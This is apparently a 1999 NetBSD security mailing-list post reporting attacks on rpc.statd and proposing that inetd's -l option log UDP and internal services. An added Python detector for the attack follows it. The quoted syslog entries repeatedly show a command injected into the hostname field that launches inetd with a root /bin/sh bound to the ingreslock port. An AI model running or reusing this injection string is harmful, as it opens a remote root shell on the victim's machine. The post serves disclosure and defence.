Subject: several poorly documented limitations of inetd's "-l" option
To: NetBSD Security Technical Discussion List <tech-security@NetBSD.ORG>
From: Greg A. Woods <woods@most.weird.com>
List: tech-security
Date: 04/18/1999 17:37:35
Last night there were two separate (by time), but seemingly identical,
scans/attacks of at least some of the machines on my network.
Interestingly the only log entries were from NetBSD 1.3.2 and 1.3.1
systems, without a peep from my 1.3.3 or 1.3I machines, nor from the
BSDI box or any other devices, so far as I can tell (though not all the
non-unix devices do as much logging as might be desirable).  So far it
looks like the attack was unsuccessful too.

Unfortunately even though I run "inetd -l" there's no trace of where
these connections came from because oddly enough inetd doesn't log UDP
connections, at all.  Now I do understand enough about RPC to know that
some RPC requests will usually appear to come from the server host
because they've been forwarded by the portmap daemon, but that doesn't
mean I don't want them logged too (and of course I'd like to see them
logged by portmap as well, which is why I back-ported libwrap support to
my 1.3.3 portmap).  In this case I don't think the requests were
forwarded by portmap though because otherwise the other newer portmap
daemons on my network would also likely have seen the request and thus
logged it, but that's not the issue.

As I hint above, the hosts where rpc.statd logged these incidents were
the hosts where I had not yet installed the latest portmapper that also
supports libwrap logging.  I'm not sure how a remote attacker could have
figured that out, but it would seem on first glance that's exactly what
they did do.  (I have what has been to date a successful IP Filter rule
on some of my systems that will block and log any attempts to use nmap
or queso to identify the target host, but these rules were not
triggered, so I'm not sure how any kind of stealth probe would have
identified which portmap daemon I'm running.)

I also noticed that the inetd code offers to log connections to
internally implemented services, but only if LIBWRAP_INTERNAL was
defined, and this feature is not enabled by default.  Although not many
people use these services, I'm sure anyone running "inetd -l" would
assume they are logged as I did before I looked at the code.  I suspect
this "feature" was not enabled by default because whoever implemented it
had some misguided goals for improving performance.  Even if I did want
superior performance for internal services, I never ever want to give up
logging for performance, especially when I've explicitly turned on what
would seem to be logging for *all* services (it's not documented as
otherwise!).

I'd like to recommend that inetd's LIBWRAP_INTERNAL be eliminated and
merged with LIBWRAP so that it's on whenever logging is enabled.  I'd
also like to recommend that logging be done by inetd for all UDP
requests too, perhaps alternately controlled by a separate option
appended to another field such as "{wait,nowait}[,log]".

I've already enabled LIBWRAP_INTERNAL in my makefiles, and I may also
try to find the time to implement at least full logging, if not a
per-entry logging option too (but I don't want to let that stop anyone else
from working on a similar fix too!).

Here is the entire set of log entries for your enjoyment (but of course
this is *not* an "invitation" to play with my machines without prior
approval!):

Apr 18 04:28:49 most rpc.statd: Invalid hostname to sm_mon: ; echo "ingreslock stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &
Apr 18 04:28:49 most rpc.statd: Invalid hostname to sm_mon: ; echo "ingreslock stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &
Apr 18 04:28:50 most rpc.statd: Unsolicited notification from host ; echo "ingreslock stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &
Apr 18 04:28:50 most rpc.statd: Unsolicited notification from host ; echo "ingreslock stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &

Apr 18 04:28:51 very rpc.statd: Invalid hostname to sm_mon: ; echo "ingreslock stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &
Apr 18 04:28:51 very rpc.statd: Invalid hostname to sm_mon: ; echo "ingreslock stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &
Apr 18 04:28:51 very rpc.statd: Unsolicited notification from host ; echo "ingreslock stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &
Apr 18 04:28:51 very rpc.statd: Unsolicited notification from host ; echo "ingreslock stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &

Apr 18 04:28:51 always rpc.statd: Invalid hostname to sm_mon: ; echo "ingreslock stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &
Apr 18 04:28:51 always rpc.statd: Invalid hostname to sm_mon: ; echo "ingreslock stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &
Apr 18 04:28:52 always rpc.statd: Unsolicited notification from host ; echo "ingreslock stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &
Apr 18 04:28:52 always rpc.statd: Unsolicited notification from host ; echo "ingreslock stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &


And then again the attack repeats at 09:54 EST:

Apr 18 09:54:07 most rpc.statd: Invalid hostname to sm_mon: ; echo "ingreslock stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &
Apr 18 09:54:07 most rpc.statd: Invalid hostname to sm_mon: ; echo "ingreslock stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &
Apr 18 09:54:07 most rpc.statd: Unsolicited notification from host ; echo "ingreslock stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &
Apr 18 09:54:07 most rpc.statd: Unsolicited notification from host ; echo "ingreslock stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &

Apr 18 09:54:08 very rpc.statd: Invalid hostname to sm_mon: ; echo "ingreslock stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &
Apr 18 09:54:08 very rpc.statd: Invalid hostname to sm_mon: ; echo "ingreslock stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &
Apr 18 09:54:08 very rpc.statd: Unsolicited notification from host ; echo "ingreslock stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &
Apr 18 09:54:08 very rpc.statd: Unsolicited notification from host ; echo "ingreslock stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &

Apr 18 09:54:09 always rpc.statd: Invalid hostname to sm_mon: ; echo "ingreslock stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &
Apr 18 09:54:09 always rpc.statd: Invalid hostname to sm_mon: ; echo "ingreslock stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &
Apr 18 09:54:10 always rpc.statd: Unsolicited notification from host ; echo "ingreslock stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &
Apr 18 09:54:10 always rpc.statd: Unsolicited notification from host ; echo "ingreslock stream tcp nowait root /bin/sh sh -i" >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &

-- 
							Greg A. Woods

+1 416 218-0098      VE3TCP      <gwoods@acm.org>      <robohack!woods>
Planix, Inc. <woods@planix.com>; Secrets of the Weird <woods@weird.com>
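Added example, not part of the post above: a small Python detector that parses syslog lines and flags rpc.statd "Invalid hostname to sm_mon" / "Unsolicited notification from host" messages whose hostname argument cannot be a hostname, which is exactly the pattern visible in the quoted entries. The sample log lines are constructed for the example, with the injected command shortened to a placeholder; the regexes assume the classic BSD syslog line layout shown in the post.

```python
import re
from collections import defaultdict

# Constructed sample lines modelled on the rpc.statd entries quoted in the post
# (the injected command is shortened to a placeholder here).
SAMPLE_LOG = """\
Apr 18 04:28:49 most rpc.statd: Invalid hostname to sm_mon: ; echo EXAMPLE >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &
Apr 18 04:28:50 most rpc.statd: Unsolicited notification from host ; echo EXAMPLE >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &
Apr 18 04:28:51 very rpc.statd: Invalid hostname to sm_mon: ; echo EXAMPLE >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob &
Apr 18 04:30:02 very rpc.statd: Invalid hostname to sm_mon: fileserver.example.net
Apr 18 04:31:15 most inetd[123]: connection from 192.0.2.10 to telnet
"""

# Classic BSD syslog layout: "Mon dd HH:MM:SS host prog[pid]: message"
SYSLOG_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) (?P<host>\S+) "
    r"(?P<prog>[^:\[]+)(?:\[\d+\])?: (?P<msg>.*)$"
)
# The two rpc.statd messages seen in the post, with the hostname argument captured.
STATD_RE = re.compile(
    r"^(?:Invalid hostname to sm_mon|Unsolicited notification from host):? ?(?P<name>.*)$"
)
# A legitimate hostname argument contains only these characters; anything
# with ';', '&', '>' or whitespace is a shell-injection attempt, not a host.
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9.-]+$")


def parse_syslog(line):
    """Split one syslog line into its fields, or return None if it does not parse."""
    m = SYSLOG_RE.match(line)
    return m.groupdict() if m else None


def statd_injection_attempts(text):
    """Return (host, timestamp, bad_name) for each rpc.statd message whose
    hostname argument is not a plausible hostname."""
    hits = []
    for line in text.splitlines():
        rec = parse_syslog(line)
        if not rec or rec["prog"] != "rpc.statd":
            continue
        sm = STATD_RE.match(rec["msg"])
        if not sm:
            continue
        name = sm.group("name").strip()
        if not HOSTNAME_RE.match(name):
            hits.append((rec["host"], rec["ts"], name))
    return hits


def hits_per_host(text):
    """Count flagged rpc.statd messages per reporting host, for a quick overview."""
    counts = defaultdict(int)
    for host, _, _ in statd_injection_attempts(text):
        counts[host] += 1
    return dict(counts)
```

Feed it the real log with `statd_injection_attempts(open("/var/log/messages").read())`; because rpc.statd itself never records the peer address, correlating the flagged timestamps with portmap or packet-filter logs is still needed to learn where the requests came from.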